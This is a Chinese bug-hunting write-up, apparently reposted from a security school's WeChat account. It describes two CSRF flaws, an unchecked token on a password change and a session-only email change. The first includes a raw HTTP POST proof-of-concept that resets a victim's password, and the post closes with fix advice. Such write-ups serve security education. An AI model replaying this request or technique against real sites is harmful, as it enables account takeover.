漏洞挖掘 | 某平台CSRF漏洞

admin 2024年3月19日12:46:22评论5 views字数 1339阅读4分27秒阅读模式

扫码领资料

获网安教程

漏洞挖掘 | 某平台CSRF漏洞

漏洞挖掘 | 某平台CSRF漏洞
本文由掌控安全学院 - zbs 投稿

案例1:

漏洞挖掘 | 某平台CSRF漏洞
缺陷1:登陆后更新修改密码,不需要传输旧密码就可以修改

缺陷2:虽然参数有token,但是删除后仍然可以修改,说明实际没有对token进行校验

漏洞挖掘 | 某平台CSRF漏洞
删除了狐假虎威的token,发现这里的token参数并没有卵用

【可以修改密码处抓包,不需要输入旧密码,不需要token】

构造csrf的poc:

POST /?m=Member&a=index HTTP/2Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, /; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 123Origin: xxxxxReferer: xxxxxxxSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersmethod=PUT&phone=xxxxx&name=zbs&oldpassword=&password=12345678&repassword=12345678

漏洞挖掘 | 某平台CSRF漏洞

【cookie值、token、旧密码三个参数都已删除】

登陆账号访问csrf页面:

漏洞挖掘 | 某平台CSRF漏洞

漏洞挖掘 | 某平台CSRF漏洞

密码已成功通过csrf修改为12345678:

漏洞挖掘 | 某平台CSRF漏洞

说明了看到token不一定代表没有csrf漏洞,有可能只是在狐假虎威。

案例2:

漏洞挖掘 | 某平台CSRF漏洞

漏洞url处可以修改邮箱,此时邮箱为[email protected]

漏洞挖掘 | 某平台CSRF漏洞

截取数据包:

发现只通过cookie的session值进行验证

构造csrf:

漏洞挖掘 | 某平台CSRF漏洞
更改为[email protected]

登录后访问csrf页面:

漏洞挖掘 | 某平台CSRF漏洞

修改成功:

漏洞挖掘 | 某平台CSRF漏洞

再次登录发现邮箱被修改

并且找回密码通过邮箱验证:

漏洞挖掘 | 某平台CSRF漏洞
漏洞挖掘 | 某平台CSRF漏洞

漏洞修复建议:
1.修复文章中的缺陷;

2.该接口的查询添加Token :Cookie里面有一段随机值,和请求包里面的GET或者POST传参有一个关联

.

漏洞挖掘 | 某平台CSRF漏洞

~

师领取

上千教程+工具+靶场账号

漏洞挖掘 | 某平台CSRF漏洞

分享后扫码加我

回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

漏洞挖掘 | 某平台CSRF漏洞

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力

原文始发于微信公众号(掌控安全EDU):漏洞挖掘 | 某平台CSRF漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月19日12:46:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞挖掘 | 某平台CSRF漏洞https://cn-sec.com/archives/2582470.html

发表评论

匿名网友 填写信息